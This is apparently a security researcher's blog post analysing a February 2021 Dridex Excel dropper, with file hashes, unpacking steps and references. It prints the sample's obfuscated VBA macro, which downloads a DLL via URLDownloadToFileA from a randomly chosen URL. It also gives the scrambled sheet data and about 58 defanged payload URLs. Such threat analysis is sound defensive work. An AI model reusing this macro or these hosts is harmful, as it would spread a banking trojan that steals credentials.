Dridex Malware Analysis [10 Feb 2021]

Dridex “also know as Bugat and Cridex” is a form of malware banking trojan and infostealer that operated by criminal group referred to as “Indrik Spider”. Dridex specializes in stealing banking credentials via systems that utilizes macros from Microsoft office products like Word and Excel. In previous recoded incident the threat actors have used Dridex to hit high value targets with ransomware [2].

This post is a report of the extracted code and URLs with other findings from the latest Dridex sample that been detected on 10 Feb 2021. This sample had been reported by a security researcher Moto_Sato. Threat actor have used similar techniques and procedure that has been discussed in the previous posts:

  1. Dridex-malware-analysis [1 Feb 2021]
  2. Dridex-malware-analysis [8 Feb 2021]

This post is a skim analysis and overview of the latest sample. for further steps and methods you can read the above post.

[Figure 1] VT Prior Analysis
File Name SHA265 File Size Detected AVs
INV-6291941768.xlsm 176eaf6e286fc4dae986a46d712f92ab08ca051ab4cbd70db9e15cc4ebfc7815
79.77 KB
12/65
ujewngbg.dll 1468c3d62d7cde7ef475bebf87a3e696b456a1973f91f596d6f508b0c0f3cd38 989.00 KB 7/67
fixed.bin 2cceb29cebee08b9cf8cc02c370dec6440633f4b2da1f44db68998be84f1cb42 1.05 MB 32/70
[Table 1] Files General Properties from VT

Threat Overview of Dridex

Based on the latest sample analysis and reports, the threat actor is using macro VBA loader in clear text functions in order to bypass detection by AV [3]

[Figure 2] Overview of Dridex from HP Threat Research Report

malware analysis

  1. Excel File

The XLSM file has four hidden sheets with white colored characters; and macro VBA locked in EvilClippy.

[Figure 3] XLSM file
Macro VBA functions
#If VBA7 And Win64 Then
    Private Declare PtrSafe Function next_for_and Lib "urlmon" _
      Alias "URLDownloadToFileA" ( _
        ByVal pCaller As LongPtr, _
        ByVal szURL As String, _
        ByVal szFileName As String, _
        ByVal dwReserved As LongPtr, _
        ByVal lpfnCB As LongPtr _
      ) As Long
#Else
    Private Declare Function next_for_and Lib "urlmon" _
      Alias "URLDownloadToFileA" ( _
        ByVal pCaller As Long, _
        ByVal szURL As String, _
        ByVal szFileName As String, _
        ByVal dwReserved As Long, _
        ByVal lpfnCB As Long _
      ) As Long
#End If



Function marball_a(ook As String, jo As Integer)
marball_a = Mid(ook, jo, onn)
End Function

Function bussy_order(asd As Variant) As String
Randomize: ii = 2 - onn: bussy_order = asd(Int((UBound(asd) + ii) * Rnd))
End Function
Sub fill_lines_u()
parcking_list = Split(RTrim(level_recharge), refreshPage(")"))
Sheets(onn).Cells(3, onn).Name = "ms_" & "excel"
mounthYYa = Split(parcking_list(1), refreshPage("+"))
For re = 0 To UBound(mounthYYa) - LBound(mounthYYa) + onn
On Error Resume Next
Sheets(onn).Cells(3, onn).value = "=" & mounthYYa(re)
fd = Len(po & ("" & (((((Run("" & "ms_" & "" & "excel"))))))))
If re = 12 Then refas = sheetsAGT:
If re = 14 Then
add2020 = sheetsAGT
next_for_and 0, Fuel_add(bussy_order(Split(parcking_list(0), refreshPage("H") & "h"))), refas & "\" & add2020, 0, 0
End If
Next
End Sub
Function sheetsAGT()
sheetsAGT = Sheets(onn).Range("C2:C8").SpecialCells(xlCellTypeConstants)
End Function
Public Function Fuel_add(y As String)
Fuel_add = Right(y, Len(y) - onn)
End Function
Function level_recharge()
Dim pockets_two As String
Dim chat_1_r As String: Dim swift_pay As String
Dim u As Integer: pockets_two = Nill_first(5)
chat_1_r = Nill_first(4): swift_pay = Nill_first(3)
For u = onn To Len(pockets_two)
empty_u = empty_u & marball_a(pockets_two, u) & marball_a(chat_1_r, u) & marball_a(swift_pay, u)
Next
level_recharge = RTrim(empty_u)
End Function
Function Nill_first(rt As Integer)
For Each Q In Sheets(rt).UsedRange.SpecialCells(xlCellTypeConstants): table_last = table_last & Q: Nill_first = table_last
Next
End Function

Function po()
po = "Z"
End Function
Function onn()
onn = 1
End Function
Function refreshPage(u As String)
refreshPage = Replace(String(4, po), po, u)
End Function

Character values hidden in sheets by order. It forms list of 50+ URLs to load a malicious DLL from one of them. The full list of URLs in APPENDIX -A

Sheet 1
ct:crruni…/h2.rHat:csai.liei.mbstHHhp/nvdaa9ckz.rHet:ts.mnggaHhts/dtoio1u.rHwt:bhynoltjaHhts/ee./jiaHhts/tneanito36aHhts/qt.uk5.pHht:dsnvsobdd.rHut:inl./q2aHhts/ooanrap1tHHhp/jaalnc/ewfaHhts/teorslodlvzHHhp/mot.m82xaHhts/ai.aadyez9diHhts/aeeomsoeir.mpm.pH1t:uui-e0whtpowa2tHHhp/an./6r.pHkt:w.w7.m9jriHhts/rcoesvec/2hrHHhp/eeiotnoom4.rHat:14omk6aHhts/tplci.m2xtHHhp/wi./mniHhts/nbtngvfiHhts/dtapkox.rH0t:miiln.m83xzHHhp/srpc/z8zHHhp/iyoq8aaHhts/mmscciouvtHHhp/aagnoocbx.pH3t:zutoeau/dltHHhp/ani.beac-klc/ivvaHhts/wtdgouwp.pHit:sknrrhuc/1mrHHhp/oig32zHHhp/oe.dc.mwptHHhp/c.pr8e8iHhts/eiitwsoq6.rH9t:39plkiwtpkowvvaHhts/etefiu3ziHhts/eac./o4aHhts/beuithrcc/8stHHhp/rndrc/uvtHHhp/wtrrtnlrteozbmtiHhts/voronlogj.pH2t:bwdsaea.liei.mmf9tHHhp/wagerbe10.rH5t:nardiog3.rHwt:ndrelisomwazHHhp/osprlta.mdh.rHrt:bn.se.nh9rHHhp/agitep8.rHyt:spt.lenptHHhp/lno.mupk.pHnt:n.srrc/yz2iHhts/abmhcogssputiHhts/icoobja)S.M"l,A1)+S.M"“J++TA(k,”+IIUESR(oG.RPE),CSFS)+ENEo,2++NLETE+S.M"“i)+AEK(U++TA(0”)+ENEodw"&&l"kc"k+S.M"g,hh""+S.M"“E(TOSC2,I(oi"EWKA()))“c"k”&l”“k++TAE2b+S.M”“E(ARD*+)H(N)67CRA(29&ARD*+)H(N)67CRA(29&ARD*+)H(N)67RD*5"l)+EVUCa++Lwb0SodwAmm"C&,v”&&"rh"v&,-"bb,++LCSFS

Sheet 2
hp/oi.rocczbx6rHHhp/outnsuosnc/craHhts/-ier-al3itHHhp/mpc/we.rHrt:mcagn/tttHHhp/egd.mdf.rHqt:uadeds.rHst:detnmu./gs.rHmt:muecbzuzHHhp/dime.mr4drHHhp/rfmijx.rHit:hrsr./x91aHhts/prhdgov1r.rHot:ltfwht.mfvoiHhts/amic/fw.rHut:lrnrlce.tvg.pHyt:arsaratsccoc/wxzHHhp/ninwk0eoa.m74gaHhts/u4cc5szHHhp/wpe6c/5q.pHpt:krtnpeisogf8aHhts/crnvi.m0kytHHhp/d.mtq.rHft:aoaohdc/6maHhts/wdnaf.pHet:fcohl28.pHvt:iurll1p7rHHhp/ovnucc/optiHhts/poeoqemiHhts/a.me0.rH4t:doaeeoni1haHhts/fnri.m8v3zHHhp/unst.mrb0saHhts/ldecitvabkiopg7.rHlt:dari.m3x3zHHhp/medoitrouc0aHhts/p./fdiHhts/nnceic/nmaHhts/te./9m.pHdt:anagad.mw3tHHhp/22rostiea.m4j.rH8t:tfulen5a.pH3t:cmbommn.rHqt:mi.atesveoak3aHhts/iapeogijaHhts/wheumttni…/q6.pH7t:dep.dc.milzHHhp/raiunmmsuosnc/bkraHhts/wlrnteyggtHHhp/ayvandagrHHhp/oxesuo./czoiHhts/rh.ciinc/ukrHHhp/uoctsf/keaHhts/rev./1wtHHhp/uoioi/xvaHhts/espc./syzHHhp/amsvsofvy.pHtt:cco.thli./wr.pH4t:pt.mn9.r)ENEclCR0)+ENEm,"+S.M"0")+FSMREC"“EWKA() LEAE++TA(0"”+CC.YR)+ENEh,l++NLETE+S.M"“O++TA(hf"hh"E&&u&)+ENEwb”"kl)+ENEb,FG.RPE3(N"an,TOSC2,-)La&0Tclm&0+S.L(,)+ENEa,FCRA(29&ARD*+)H(N)67CRA(29&ARD*+)H(N)67CRA(29&ARD*+)A(8).l++TAE2b+CLe&,"hf&“AACCm00ph”,"kgro"s&&,0+FELEAE

Sheet 3
ts/uebnteoausvaHhts/nlesocnlkoi8.rHdt:x-apru./yoaHhts/kroni1rHHhp/eal.fhzoaHhts/taec/crtHHhp/e.ucqfrHHhp/airtitiqhwtHHhp/yosl/q7iHhts/egoic./c6aHhts/aierprtHHhp/ogtaixct.rHpt:ahmoi.mi63rHHhp/illeoec/xu.pH8t:oracohvhtHHhp/enge-amn/gczHHhp/mrdmyerhhesodx9iHhts/stge.0bspc/5n.rHgt:beuh851iHhts/wor0ozm2zHHhp/oecctrc.myy.rHxt:thanaoc/vweaHhts/6c/jttHHhp/urusmtos0.rHot:w.jo2hzHHhp/ayo./p5zHHhp/nse./s7vaHhts/tefeeop9w.pH9t:rgu.mzc.pHjt:zpc/dytHHhp/e.xn…/13.rHst:lfsatc/s6viHhts/kflshbg54.rH7t:cerran-otaa.mzyprHHhp/inanc/30yiHhts/oagwco.mxf.rH0t:masrj.pH2t:cttonlomj.rH6t:chsbfcwzHHhp/gcdilyc/c4aHhts/7.ocmhnrrc/corHHhp/huri./iczHHhp/hl.mygbtHHhp/olqlycei.mxz.rH1t:ggru.m5k.rHzt:w.ecieaeavcnv50zHHhp/eleceic/ciiHhts/ornrciiocnlkof5c.rHtt:w.lea./5ryaHhts/vue./fxlaHhts/rtmotnrsya.pHbt:wkoaeoveoxp8aHhts/ywolsuom.rH6t:galesyr2aHhts/prtnnxp.rH5t:caceoas12iHhts/pgee.mlgxzHHhp/ohomenoeucjqzHHhp/htc/72r))TA(i"H(1++TA(A")+ENEh"++(NB(AHd,TOSC1),O(L)+S.M"“3)+AEK(U++TA(kcl+CC.YR)+ENEv,”+S.M"gw,“klxh"th++TA(e"S&&l++TA(bLTEWKA()FDRmgG.RPE311&olh&“i&ph)+EVUCb++TA(bLTH(N)67CRA(29&ARD*+)H(N)67CRA(29&ARD*+)H(N)67CRA(29,N)+&d”+S.L(,)+A(go”&gw",&&C"A,&“kn”&&s"0 ba0)+I.O(L)

Sheet 4
h25h3g70h8

After picking a random URL from the list, the final call is locate a the path to load from “%TEMP%” and the process “regsvr32.exe”. Even after closing the excel file the process keeps running.

[Figure 4] Dynamic Analysis

2. DLL File

Threat actor seems to be using different tool or technique each time to pack the same DLL file that been seen in the previous analyzed samples [9][10] . However, the overall procedure to reverse engineer this part is the same. Self-Injection technique is the way this DLL performing.

[Figure 5] Pestudio overview of DLL file
[Figure 6] Entropy from DetectItEasy

Even though, there’s not detection of the method used to pack the malicious file in any of the tools like DetectItEasy (DiE), but it’s clear enough something is hidden.

Self-Injection is the method the threat actor been using so far and it’s simple for the analyst to extract the packed file. Using x32dbg and BreakPoint on <VirtualAlloc> and <VirtualProtect> is the way to go.

When loading the hidden stub, there seems to be a clear text of PowerShell use. This way is just to confuse the reverse engineering process. There seems no use of PowerShell at this point or when dynamically running the malicious file. The stub code is loaded at <009F0000> in this example!

[Figure 7] BreakPoints at hidden code

After that, the “packed” or in better term the “overwritten” executable is been run in memory in the same original location when it first loaded in x32dbg and it’s possible to save the dump from memory. Since it’s from memory, it requires fixing the Raw Addresses using Pe-bear or CFF Explorer.

[Figure 8] The overwritten binary with PE header

The fixed-dumped binary has been submitted to VT and anyRun. It’s seems to be the same exact DLL that been dumped in the previous analysis! with little overhead of misleading codes.

[Figure 9] Pestudio of dumped file

appendix -a

DO NOT run any of below URLs

hxxps://courier[.]burnnotice[.]co[.]za/buhxs26v[.]rar
hxxps://xn--viadeparra-u9a[.]cl/k3yzio[.]tar
hxxps://tmkspr[.]com/nnwige1g[.]rar
hxxps://medcatalog[.]info/h1tzuto[.]tar
hxxps://bethgayden[.]com/ldctfrj[.]tar
hxxps://ueea[.]edu[.]ec/dqjsfi[.]rar
hxxps://dateintrentaminuti[.]it/qogh3sw6[.]tar
hxxps://myquotes[.]club/kzq5u7[.]zip
hxxps://ddesignmoveis[.]com[.]br/d4cdd6[.]rar
hxxps://iranfilme[.]ir/jpqxr2[.]tar
hxxps://hoorgostaran[.]ir/xaxcp9t11[.]tar
hxxps://ajpharmaholding[.]com/vie16wr3f[.]rar
hxxps://littleflowerhostel[.]com/dfxlvuvo[.]zip
hxxps://omaromatic[.]com/h8fv2whx[.]tar
hxxps://learning[.]real-academy[.]net/zvg9gcd[.]zip
hxxps://amarresdeamorymaestroshechiceros[.]com/dpwxmx9[.]zip
hxxps://unsuiting-week[.]000webhostapp[.]com/w75a4n2g[.]tar
hxxps://bauen4u[.]ch/c8655rs1[.]zip
hxxps://www[.]power760[.]com/z95mjq2r[.]zip
hxxps://korrectconceptservices[.]com/gy2fyh8[.]rar
hxxps://techerainnovation[.]com/o0vmkw4ye[.]tar
hxxps://1d64[.]com/mtjkqt6[.]tar
hxxps://autorpauloschmidt[.]com/s260xm[.]tar
hxxps://www[.]idj[.]no/a2mfhn[.]zip
hxxps://fancybooth[.]nl/g2pv85f[.]zip
hxxps://industreal[.]pl/k1sop7x7v[.]rar
hxxps://motiveinfluence[.]com/p8o93pwxt[.]zip
hxxps://rspgroupe[.]com/qzzec8m[.]zip
hxxps://ziapy[.]com/qed80ya[.]tar
hxxps://demo[.]maxsence[.]co[.]in/oi1u13vh[.]tar
hxxps://laffansgranito[.]com/c8sbv6x3v[.]zip
hxxps://zukunftslotse[.]hamburg/b5d04ls[.]tar
hxxps://calendrier[.]cabinet-avocat-bakkali[.]com/pzigyv7pv[.]rar
hxxps://diwantrading[.]com/u33wx0p3y[.]zip
hxxps://smokeandgrowrichtour[.]com/ux1cfm0[.]rar
hxxps://mopai[.]sg/r3fj2d[.]zip
hxxps://content[.]codencil[.]com/mwnjpm[.]tar
hxxps://ccth[.]esp[.]br/f89cemw8[.]zip
hxxps://agenciadigitalwdys[.]com/qwc634[.]tar
hxxps://32792[.]prolocksmithwinterpark[.]com/w4cvjov[.]rar
hxxps://thefuturelife[.]in/u5i3acz[.]zip
hxxps://chemlab[.]com[.]my/mgonb4[.]tar
hxxps://mobile[.]qualitytechservice[.]com/ax8kzs3[.]tar
hxxps://grignardpure[.]com/g5uikvj[.]tar
hxxps://www[.]therecruitmentalternative[.]co[.]nz/vbq5m60t[.]zip
hxxps://developer[.]codencil[.]com/gicjli[.]zip
hxxps://browardinsurancemiami[.]solucioneslink[.]com/fmb5fkc9r[.]tar
hxxps://www[.]allgreenart[.]be/ey51gr0gy[.]tar
hxxps://navayurveda[.]in/odfgax3gl[.]rar
hxxps://nordxtremesolutions[.]ro/smcywzaao[.]zip
hxxps://workshop[.]arceliotivane[.]com/xduphk8[.]rar
hxxps://buynow[.]costless[.]fun/ohkm9e[.]rar
hxxps://garagelivet[.]se/yp1r8w2[.]tar
hxxps://supportit[.]online/xnxppv[.]tar
hxxps://cleanscope[.]com[.]au/sps1ky2[.]zip
hxxps://nap[.]mgsservers[.]com/flyvgzyx2[.]zip
hxxps://coachboom[.]mhtechnologies[.]us/cpwjurqt[.]zip
hxxps://phittc[.]com/on7b92j[.]rar

References

[1] Indrik Spider, https://malpedia.caad.fkie.fraunhofer.de/actor/indrik_spider

[2] Big Game Hunting: The Evolution of INDRIK SPIDER From Dridex Wire Fraud to BitPaymer Targeted Ransomware, https://www.crowdstrike.com/blog/big-game-hunting-the-evolution-of-indrik-spider-from-dridex-wire-fraud-to-bitpaymer-targeted-ransomware/

[3] Dridex Malicious Document Analysis: Automating the Extraction of Payload URLs, https://threatresearch.ext.hp.com/dridex-malicious-document-analysis-automating-the-extraction-of-payload-urls/

[4] Excel file from AnyRun , https://app.any.run/tasks/3d132db7-78d1-40bb-8b9f-86d9049a1107/#

[5] Excel File in VT, https://www.virustotal.com/gui/file/176eaf6e286fc4dae986a46d712f92ab08ca051ab4cbd70db9e15cc4ebfc7815/details

[6] DLL file in VT, https://www.virustotal.com/gui/file/1468c3d62d7cde7ef475bebf87a3e696b456a1973f91f596d6f508b0c0f3cd38/detection

[7] Unpacked file submitted to VT, https://www.virustotal.com/gui/file/2cceb29cebee08b9cf8cc02c370dec6440633f4b2da1f44db68998be84f1cb42/details

[8] Unpacked file submitted to AnyRun, https://app.any.run/tasks/8f8f954d-6c3c-415d-a9ff-fd0a50209afd

[9] Dridex-malware-analysis [1 Feb 2021]

[10] Dridex-malware-analysis [8 Feb 2021]

Article Link: https://aaqeel01.wordpress.com/2021/02/10/dridex-malware-analysis-10-feb-2021/